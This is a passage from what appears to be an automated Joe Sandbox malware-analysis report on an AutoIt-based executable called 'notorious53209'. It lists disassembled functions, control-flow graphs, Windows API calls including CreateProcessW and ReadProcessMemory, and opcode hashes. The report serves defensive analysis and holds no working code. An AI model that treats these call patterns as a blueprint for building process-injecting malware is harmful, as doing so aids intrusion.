8a578b-8a578e 1251->1252 1253 8a580c-8a5810 1251->1253 1252->1219 1254 8a5790 1252->1254 1253->1228 1254->1250
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                  • Instruction ID: a8c9d7cdc34dd1b7a68cd2ff06492c9ff89dc08201488cd9622f0f6b5d4b08d5
                                                  • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                  • Instruction Fuzzy Hash: 8751B571A00B09DBEB248FB9C88466E77A1FF52324F648729F825E6AD0D7709D908B51
                                                  Function 008869CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1255 8869ca-8869f1 call 884f3d 1258 8be45a-8be46a call 8e97e5 1255->1258 1259 8869f7-886a05 call 884f3d 1255->1259 1263 8be46f-8be471 1258->1263 1259->1258 1264 886a0b-886a11 1259->1264 1265 8be473-8be476 call 884faa 1263->1265 1266 8be490-8be4d8 call 8a0ff6 1263->1266 1268 8be47b-8be48a call 8e4534 1264->1268 1269 886a17-886a39 call 886bec 1264->1269 1265->1268 1275 8be4da-8be4e4 1266->1275 1276 8be4fd 1266->1276 1268->1266 1278 8be4f8-8be4f9 1275->1278 1279 8be4ff-8be512 1276->1279 1280 8be4fb 1278->1280 1281 8be4e6-8be4f5 1278->1281 1282 8be689-8be69a call 8a2f95 call 884faa 1279->1282 1283 8be518 1279->1283 1280->1279 1281->1278 1293 8be69c-8be6ac call 887776 call 885efb 1282->1293 1285 8be51f-8be522 call 8875e0 1283->1285 1289 8be527-8be549 call 885f12 call 8e768b 1285->1289 1298 8be54b-8be558 1289->1298 1299 8be55d-8be567 call 8e7675 1289->1299 1306 8be6b1-8be6e1 call 8dfcb1 call 8a106c call 8a2f95 call 884faa 1293->1306 1302 8be650-8be660 call 88766f 1298->1302 1308 8be569-8be57c 1299->1308 1309 8be581-8be58b call 8e765f 1299->1309 1302->1289 1311 8be666-8be683 call 8874bd 1302->1311 1306->1293 1308->1302 1318 8be59f-8be5a9 call 885f8a 1309->1318 1319 8be58d-8be59a 1309->1319 1311->1282 1311->1285 1318->1302 1324 8be5af-8be5c7 call 8dfc4d 1318->1324 1319->1302 1330 8be5ea-8be5ed 1324->1330 1331 8be5c9-8be5e8 call 887f41 call 885a64 1324->1331 1333 8be61b-8be61e 1330->1333 1334 8be5ef-8be60a call 887f41 call 886999 call 885a64 1330->1334 1355 8be60b-8be619 call 885f12 1331->1355 1336 8be63e-8be641 call 8e7621 1333->1336 1337 8be620-8be629 call 8dfb6e 1333->1337 1334->1355 1344 8be646-8be647 call 8a106c 1336->1344 1337->1306 1347 8be62f-8be639 call 8a106c 1337->1347 1350 8be64c-8be64f 1344->1350 1347->1289 1350->1302 1355->1344
                                                  APIs
                                                    • Part of subcall function 00884F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884F6F
                                                  • _free.LIBCMT ref: 008BE68C
                                                  • _free.LIBCMT ref: 008BE6D3
                                                    • Part of subcall function 00886BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00886D0D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                  • API String ID: 2861923089-1757145024
                                                  • Opcode ID: ac3f92deaa02749ff6c1dc7ac35b6a65d80e21b222c7c9ebba4f5abeefe6b108
                                                  • Instruction ID: eaf4352113fdb991e1f9b3970f1e6837b365ab8ff63fc96d10e7704b9acea53b
                                                  • Opcode Fuzzy Hash: ac3f92deaa02749ff6c1dc7ac35b6a65d80e21b222c7c9ebba4f5abeefe6b108
                                                  • Instruction Fuzzy Hash: FD916B71910619AFCF14EFA8CC919EDB7B4FF19314F14446AF816EB2A1EB30A904CB61
                                                  Function 008835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008835A1,SwapMouseButtons,00000004,?), ref: 008835D4
                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,008835A1,SwapMouseButtons,00000004,?,?,?,?,00882754), ref: 008835F5
                                                  • RegCloseKey.ADVAPI32(00000000,?,?,008835A1,SwapMouseButtons,00000004,?,?,?,?,00882754), ref: 00883617
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  • Opcode ID: 33f7347bde5489f20c00ca09925831944039847d0ece8a0980e93e4b4a669240
                                                  • Instruction ID: fe0bb9443d7d22fa169642dea5373805f737febc28797ecf9303159ab993e237
                                                  • Opcode Fuzzy Hash: 33f7347bde5489f20c00ca09925831944039847d0ece8a0980e93e4b4a669240
                                                  • Instruction Fuzzy Hash: 12114871514208BFDB21DFA8DC409AEB7BCFF15B40F008469E805E7210E2719F40A760
                                                  Function 008E97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00885045: _fseek.LIBCMT ref: 0088505D
                                                    • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AAE
                                                    • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AC1
                                                  • _free.LIBCMT ref: 008E992C
                                                  • _free.LIBCMT ref: 008E9933
                                                  • _free.LIBCMT ref: 008E999E
                                                    • Part of subcall function 008A2F95: HeapFree.KERNEL32(00000000,00000000), ref: 008A2FA9
                                                    • Part of subcall function 008A2F95: GetLastError.KERNEL32(00000000,?,008A9C64), ref: 008A2FBB
                                                  • _free.LIBCMT ref: 008E99A6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                  • String ID:
                                                  • API String ID: 1552873950-0
                                                  • Opcode ID: 7179a2ff507044a4d5ea9946a9eb7f03cddcb89bd38e099aeab182df50c6b667
                                                  • Instruction ID: 9ad59ede26655de7c97f30b735369bd6a5aa280fa879a53e7d27d5539949eae2
                                                  • Opcode Fuzzy Hash: 7179a2ff507044a4d5ea9946a9eb7f03cddcb89bd38e099aeab182df50c6b667
                                                  • Instruction Fuzzy Hash: 89517BB1904658AFDF249F69CC81A9EBBB9FF49310F0000AEF649E7241DB715A80CF59
                                                  Function 008A493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                  • String ID:
                                                  • API String ID: 2782032738-0
                                                  • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                  • Instruction ID: 3858f6d37771f47e3c24ca3dc1aec4d15985f3fb40e152fca00f3eedcc3d25c6
                                                  • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                  • Instruction Fuzzy Hash: 7441C7716007199BFF188E69C88056F7BA6FFC6360B24913DE855C7E50D7B0AD518744
                                                  Function 008873E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 008BEE62
                                                  • 75B0A2D5.COMDLG32(?), ref: 008BEEAC
                                                    • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                                                    • Part of subcall function 008A09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A09F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: NamePath$FullLong_memset
                                                  • String ID: X
                                                  • API String ID: 3051022977-3081909835
                                                  • Opcode ID: 9033c5170e9a9fc9d46a98c147dacbe9ef34081a418eee2a687dee5e4fac4b88
                                                  • Instruction ID: 7332dd597541519d5a4bac5a5305f503a1e1f3471eea996248fa7bc909d4d7ce
                                                  • Opcode Fuzzy Hash: 9033c5170e9a9fc9d46a98c147dacbe9ef34081a418eee2a687dee5e4fac4b88
                                                  • Instruction Fuzzy Hash: 3F21C671A142589BDF11EF98CC45BEE7BF8EF49314F104019E408E7241DBF899498F92
                                                  Function 008E901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock_memmove
                                                  • String ID: EA06
                                                  • API String ID: 1988441806-3962188686
                                                  • Opcode ID: 261686cfba9a3e557e2b8d3bdf651bf030d41a945e79675cd9f858342ece74c7
                                                  • Instruction ID: a1ee452bda6484017fecd21331b906939b957f0f260f05a6614178e7fe323410
                                                  • Opcode Fuzzy Hash: 261686cfba9a3e557e2b8d3bdf651bf030d41a945e79675cd9f858342ece74c7
                                                  • Instruction Fuzzy Hash: CF01F9719046586EDB28C7A8C81AEEE7BF8EB01301F00419AF592D2581E5B9A6048B60
                                                  Function 008A0FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008A594C: __FF_MSGBANNER.LIBCMT ref: 008A5963
                                                    • Part of subcall function 008A594C: __NMSG_WRITE.LIBCMT ref: 008A596A
                                                    • Part of subcall function 008A594C: RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001), ref: 008A598F
                                                  • std::exception::exception.LIBCMT ref: 008A102C
                                                  • __CxxThrowException@8.LIBCMT ref: 008A1041
                                                    • Part of subcall function 008A87DB: RaiseException.KERNEL32(?,?,00000000,0093BAF8,?,00000001,?,?,?,008A1046,00000000,0093BAF8,00889FEC,00000001), ref: 008A8830
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                  • String ID: bad allocation
                                                  • API String ID: 3902256705-2104205924
                                                  • Opcode ID: 6507c1662dd4a63f8e25663dba656a9ad93f005db6c01afa8ff30e8228336dfc
                                                  • Instruction ID: 21330179613f07a357f1d6e33b67e04ba139c197e6cf9ee5af678c0aa93c02ec
                                                  • Opcode Fuzzy Hash: 6507c1662dd4a63f8e25663dba656a9ad93f005db6c01afa8ff30e8228336dfc
                                                  • Instruction Fuzzy Hash: 94F0813550471DA6EF21BB5CEC0A9DF7BA8FF02350F100425F904E6991EFB18AD086A2
                                                  Function 008E9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 008E9B82
                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008E9B99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Temp$FileNamePath
                                                  • String ID: aut
                                                  • API String ID: 3285503233-3010740371
                                                  • Opcode ID: 753ee89bc0254468b335f32d536b7e3f42b77d27bd1e5dcc41e0580b1364ea25
                                                  • Instruction ID: e3751dc1905be67bbff95b6277e5753323dd367327e9e0fe7c6b64e410affb62
                                                  • Opcode Fuzzy Hash: 753ee89bc0254468b335f32d536b7e3f42b77d27bd1e5dcc41e0580b1364ea25
                                                  • Instruction Fuzzy Hash: CDD05E7954430DAFDB209B94EC0EF9A772CEB04704F0042A1BEA4D10A1DEB066989B91
                                                  Function 001012A0 Relevance: 5.2, APIs: 3, Instructions: 720processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNEL32(?,00000000), ref: 00101ACD
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00101B13
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.358795810.0000000000100000.00000040.00001000.00020000.00000000.sdmp, Offset: 00100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_100000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateMemoryRead
                                                  • String ID:
                                                  • API String ID: 2726527582-0
                                                  • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                  • Instruction ID: a32c08d005ba76f442df344cf081799ba6414caf3e38dd2186d9f3a5a78f5156
                                                  • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                  • Instruction Fuzzy Hash: 10620B30A14258DBEB24CFA4C854BDEB376EF58300F1091A9D14DEB2D4E7B99E81CB59
                                                  Function 008FCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa0505f1b62f07058b4dd96e2e1f596a5b3ebb38d4f4e4d60cdef9cd4bcc6c45
                                                  • Instruction ID: bb21f0aa7ddbc1197de4dc11c637bd55d839b15b095523b5b4250e3e34a4ab46
                                                  • Opcode Fuzzy Hash: fa0505f1b62f07058b4dd96e2e1f596a5b3ebb38d4f4e4d60cdef9cd4bcc6c45
                                                  • Instruction Fuzzy Hash: CCF13871A083059FC714DF28C480A6ABBE5FF88314F14892EFA99DB251DB71E945CF82
                                                  Function 0088F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A03D3
                                                    • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 008A03DB
                                                    • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A03E6
                                                    • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A03F1
                                                    • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 008A03F9
                                                    • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 008A0401
                                                    • Part of subcall function 00896259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 008962B4
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0088FB2D
                                                  • OleInitialize.OLE32(00000000), ref: 0088FBAA
                                                  • CloseHandle.KERNEL32(00000000), ref: 008C49F2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                                  • String ID:
                                                  • API String ID: 3094916012-0
                                                  • Opcode ID: eb1eea74d4269f4418998727dfc56b943efae15b182640d2f9215273c74bff51
                                                  • Instruction ID: 9cbb98b498c106104708a9f75b010f66397e437097c5564373b9da2d795d79fc
                                                  • Opcode Fuzzy Hash: eb1eea74d4269f4418998727dfc56b943efae15b182640d2f9215273c74bff51
                                                  • Instruction Fuzzy Hash: FD81ABF89293908ECBA4EF39E954E557AF4FB9B718310812AE119C7272EB314444EF13
                                                  Function 008843DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00884401
                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008844A6
                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008844C3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_$_memset
                                                  • String ID:
                                                  • API String ID: 1505330794-0
                                                  • Opcode ID: 660e21c32245a27eb4845a710434521332303af0c590076c6dd0c5fbbb8e6a96
                                                  • Instruction ID: 283a3d575c208f21db394ad4a90cbe7d94ccf662c5f40be6284fd92fe996058a
                                                  • Opcode Fuzzy Hash: 660e21c32245a27eb4845a710434521332303af0c590076c6dd0c5fbbb8e6a96
